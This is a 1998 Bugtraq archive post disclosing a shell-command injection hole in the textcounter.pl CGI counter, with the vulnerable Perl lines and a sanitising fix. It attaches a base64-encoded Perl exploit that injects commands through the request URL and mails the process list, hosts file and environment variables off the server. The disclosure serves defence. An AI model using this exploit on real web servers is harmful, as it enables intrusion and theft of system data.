Bugtraq mailing list archives
textcounter.pl SECURITY HOLE
From: pdoru () kappa ro (Doru Petrescu)
Date: Wed, 24 Jun 1998 08:51:11 +0300
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime () docserver cac washington edu for more info.
---490663578-807079570-898667471=:9579
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi,
I've found a serious problem in textcounter.pl script that enable
everybody to execute commands on your system with the same rights as the
httpd daemon.
Program was created by Matt Wright (mattw () worldwidemart com) and
has a "Last Modified Date" at 5/10/96. You can find it at
http://www.worldwidemart.com/scripts/.
The counter use the enviroment variable DOCUMENT_URI to
create/read/update a file where it keeps the hit count. There is NO test
for shell metacharacters, so you can easily put something evil, that will
make PERL to execute it ...
This is the two lines responsible with the problem ...
if (-e "$data_dir$count_page") {
open(COUNT,"$data_dir$count_page");
....
}
Because of the test condition, the attack have to be repeated twice to
succeed. First time the condition is false and the tricky file gets
created, and the second time, the condition is true and our commands get
executed ... Nice isn't it ? :(
The fix is very simple: add after line 91, another line that will make
sure that there is NO tricky characters in the filename.
$count_page = "$ENV{'DOCUMENT_URI'}"; # the original 91 line ....
$count_page =~ s/([^a-z0-9])/sprintf("%%%02X",$1)/ge; # ADD THIS !!!!!
If you want to make sure that your system is vulnerable or not, you
can use the small program that it's attached. No cracking please ...
Best regards,
------
Doru Petrescu
KappaNet - Software Engineer
E-mail: pdoru () kappa ro
---490663578-807079570-898667471=:9579
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="cnt-exploit.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.980624085111.9579B () pop3 kappa ro>
Content-Description: counter.pl exploit
IyEvdXNyL2Jpbi9wZXJsDQoNCiRVUkw9J2h0dHA6Ly9kdHAua2FwcGEucm8v
YS90ZXN0LnNodG1sJzsgICAgIyBwbGVhc2UgX0RPXyBfbW9kaWZ5XyB0aGlz
IA0KJEVNQUlMPSdwZG9ydUBwb3AzLmthcHBhLnJvLHJvb3QnOyAgIAkgICAg
IyBwbGVhc2UgX0RPXyBfbW9kaWZ5XyB0aGlzDQoNCg0KaWYgKCRBUkdWWzBd
KSB7DQogICAkQ01EPSRBUkdWWzBdOw0KfWVsc2V7DQogICAkQ01EPSIocHMg
YXg7Y2QgLi47Y2QgLi47Y2QgLi47Y2QgZXRjO2NhdCBob3N0cztzZXQpXHxt
YWlsICR7RU1BSUx9IC1zYW5vdGhlcmVfb25lIjsNCn0NCg0KJHRleHQ9IiR7
VVJMfS87SUZTPVw4OyR7Q01EfTtlY2hvfCI7DQokdGV4dCA9fiBzLyAvXCRc
e0lGU1x9L2c7DQoNCiNwcmludCAiJHRleHRcbiI7DQoNCnN5c3RlbSh7Indn
ZXQifSAid2dldCIsICR0ZXh0LCAiLU8vZGV2L251bGwiKTsNCnN5c3RlbSh7
IndnZXQifSAid2dldCIsICR0ZXh0LCAiLU8vZGV2L251bGwiKTsNCiNzeXN0
ZW0oeyJseW54In0gImx5bngiLCAkdGV4dCk7IA0KI3N5c3RlbSh7Imx5bngi
fSAibHlueCIsICR0ZXh0KTsgICAgICMgaWYgeW91IGRvbid0IGhhdmUgIndn
ZXQiDQoJCQkJICAjIHlvdSBjYW4gdHJ5IHdpdGggIkx5bngiDQoNCg==
---490663578-807079570-898667471=:9579--
Current thread:
- ncftp 2.4.3 bug Paul Boehm (Jun 20)
- <Possible follow-ups>
- Re: ncftp 2.4.3 bug Mike Gleason (Jun 22)
- Re: ncftp 2.4.3 bug Paul Boehm (Jun 22)
- Re: ncftp 2.4.3 bug Liviu Daia (Jun 23)
- textcounter.pl SECURITY HOLE Doru Petrescu (Jun 23)
- Re: textcounter.pl SECURITY HOLE Rich Lafferty (Jun 24)
- Yipes named attack Anonymous (Jun 24)
- security hole in mailx Alvaro Martinez Echevarria (Jun 24)
- Re: security hole in mailx gold (Jun 25)
- Re: security hole in mailx Casper Dik (Jun 25)
- Bug is sudo? Rhodie (Jun 25)
- Re: Bug is sudo? Warner Losh (Jun 26)
- Re: Bug is sudo? Todd C. Miller (Jun 27)
- Re: security hole in mailx Alvaro Martinez Echevarria (Jun 25)
- Re: security hole in mailx Ben Collins (Jun 25)